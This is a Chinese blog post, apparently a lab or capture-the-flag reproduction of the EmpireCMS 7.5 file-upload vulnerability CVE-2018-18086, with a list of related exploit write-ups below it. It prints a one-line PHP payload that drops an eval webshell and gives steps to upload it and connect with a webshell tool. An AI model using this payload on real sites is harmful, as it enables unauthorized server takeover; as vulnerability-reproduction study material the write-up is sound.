empirecms 文件上传 (CVE-2018-18086)

最新推荐文章于 2024-10-18 11:12:40 发布
最新推荐文章于 2024-10-18 11:12:40 发布
阅读量891 收藏 1
点赞数 1
文章标签: 安全 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63124284/article/details/127152769
版权

一、漏洞描述

EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。EmpireCMS7.5版本中的/e/class/moddofun.php文件的”LoadInMod”函数存在安全漏洞,攻击者可利用该漏洞上传任意文件。

二、影响版本

EmpireCMS<=7.5

三、漏洞复现

  1. 进入靶场,登入后台 http://ip/empirecms/e/admin/,账号/密码:admin/123456。

系统->管理数据表->导入系统模型

 2bf1f4cf9cd3b27bb230d172e168eaf1.png

2.上传*.php.mod文件,填写空格内容,选择马上导入,并确认: 

<?php file_put_contents("sh3ll.php","<?php @eval(\$_POST[cmd]); ?>");?>

 29b37d3c174ba0ef33f0790f8f0606c4.jpeg

 3.访问下看有没有成功解析

 1f5d0be30c6438c631ce435cad0d2ca3.jpeg

 4.webshell管理工具连接http://ip/empirecms/e/admin/shell.php 密码cmd。

 5.获取flag

恸.283
关注
Atom CMS SQL注入漏洞 (CVE-2022-25488)
千寻的博客
12-01 1686
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面
empirecms 文件上传漏洞 (CVE-2018-18086
xy_wjyjw的博客
10-30 193
在桌面新建php文件,把后缀名修改为mod,写入这句话。在虚拟终端输入dir /tmp 查看flag。系统——数据表与系统模型——导入系统模型。上传之后点击马上导入,并导入成功。访问网页,发现空白,说明添加成功。empirecms 文件上传。用蚁剑连接,添加成功。
记录一次漏洞复现--cve-2018-18086
最新发布
banliyaoguai的博客
10-18 144
许久没写,近期打算将自己项目中遇到的一些漏洞整理复现一下。
EmpireCMS文件上传(CVE-2018-18086)
m0_65150886的博客
02-20 480
EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。6.上传该文件(数据表名随意填写,我这里填写的是php),点击马上导入。1.访问http://ip:port,出现如下页面,开始实验。4.点击系统,数据表与系统模型,管理数据表,导入系统模型。7.访问上传的getshell文件。2.访问管理员登录界面。
empirecms 文件上传CVE-2018-18086)漏洞复现
weixin_42675091的博客
09-02 1510
empirecms 文件上传CVE-2018-18086)漏洞复测
【漏洞复现-EmpireCms-文件上传】vulfocus/empirecms-cve_2018_18086
10-09 1906
【EmpireCms-文件上传】帝国建站
empire-CVE-2018-19462
m0_51369969的博客
07-13 362
http://192.168.11.139:35142/ 后台:http://192.168.11.139:35142/empirecms/e/admin/admin/123456 http://192.168.11.139:35142/empirecms/e/admin/admin.php?ehash_gipV2=fxgYwmocc0xpMHh8YfdW 执行SQL语句 http://192.168.11.139:35142/empirecms/getshell_2.php...
EmpireCMS-6.0os-SC-GBK.zip
03-09
标题中的"EmpireCMS-6.0os-SC-GBK.zip"指的是该系统的第6.0版本,特别为简体中文环境(SC)设计,并使用GBK编码。GBK编码是中国大陆广泛使用的汉字编码标准,能够包含大部分中文字符,适用于中文网站的建设。 ...
帝国cms empirecms 文件上传CVE-2018-18086)复现
YouthBelief的博客
11-18 3292
所有文章,仅供安全研究与学习之用,后果自负! 这里写目录标题empirecms 文件上传CVE-2018-18086)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 empirecms 文件上传CVE-2018-18086) 0x01 漏洞描述 EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS)。 EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。 密码:a
文件上传】empirecms 文件上传CVE-2018-18086
wj33333的博客
11-16 329
描述: EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS)。EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。可利用该漏洞上传任意文件。网站后台地址:/empirecms/e/admin/index.php。3.上传一句话木马,因为mod后缀,需要用到文件包含。后台管理账密:admin : 123456。
CVE-2018-18086
weixin_44770698的博客
03-21 576
CVE-2018-18086
帝王cms上传php,帝国cms怎么上传大文件
weixin_39560245的博客
03-26 215
1.一般的文件上传,除非文件很小。就像一个5M的文件,很可能要超过一分钟才能上传完。但在php中,默认的该页最久执行时间为 30 秒。就是说超过30秒,该脚本就停止执行。这就导致出现无法打开网页的情况。这时我们可以修改 max_execution_time查找max_execution_time默认是30秒,改为max_execution_time = 00表示没有相关推荐:《CMS教程》2. 修...
帝国CMS粘贴word图片且图片文件自动上传功能
Mr_Zang666的博客
03-09 144
ueditor粘贴不能粘贴word中的图片是一个很头疼的问题,在我们的业务场景中客户要求必须使用ueditor并且支持word的图片粘贴,因为这个需求头疼了半个月,因为前端方面因为安全的原因是不允许访问本地文件的。接下来是怎么拿到本地地址的文件,怎么将本地地址搞成文件,我查阅了好久好久的资料,还请教了各路大神(骚骚的三水,和传说中的周皇),得到一个结论,单纯前端不可能通过本地地址拿到文件(于是第一条解决思路出来了,在执行 罪魁祸首代码 之前,将本地的地址过滤出来,上传到服务器然后用服务器的地址进行替换,
文件上传--weblogic(CVE-2018-2894)
weixin_44940180的博客
08-19 342
漏洞详情 Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制。 利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。 WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do 影响范围 Oracle WebLogic Server,版本10.3.6.0,12.1.3
帝国cms开启php上传,解决帝国cms上传文件大小的限制php.ini设置方法
weixin_28757113的博客
04-02 271
1. 一般的文件上传,除非文件很小.就像一个5M的文件,很可能要超过一分钟才能上传完.但在php中,默认的该页最久执行时间为 30 秒.就是说超过30秒,该脚本就停止执行.这就导致出现 无法打开网页的情况.这时我们可以修改 max_execution_time在php.ini里查找max_execution_time默认是30秒.改为max_execution_time = 00表示没有限制2. ...
monstra 文件上传(CVE-2020-13384)
m0_65150886的博客
01-02 660
Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。6.编写test.phar文件。4.跳转到登录页面,随意注册。2.进行注册,随意填写就好。输入注册的用户名密码登录。1.访问ip:port。3.注册成功,点击登录。
帝王cms上传php,帝国cms上传文件的功能代码注释-网站程序网
weixin_29129247的博客
03-26 571
//上传文件//file 文件在Web服务器中临时存储的位置//file_name 用户系统中的文件名称//file_type 文件的MIME类型//file_size 文件的字节大小function DoTranFile($file,$file_name,$file_type,$file_size,$classid,$ecms=0){global $public_r,$class_r,$doet...
EmpireCMS: PHP网站管理系统源码分析与结构
通常,安装步骤包括上传文件到服务器、设置数据库连接信息、执行安装脚本以及配置系统参数等。安装完成后,管理员可通过管理界面进行后续的系统配置和内容管理。 知识点六:维护与扩展性 EmpireCMS的设计注重代码的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值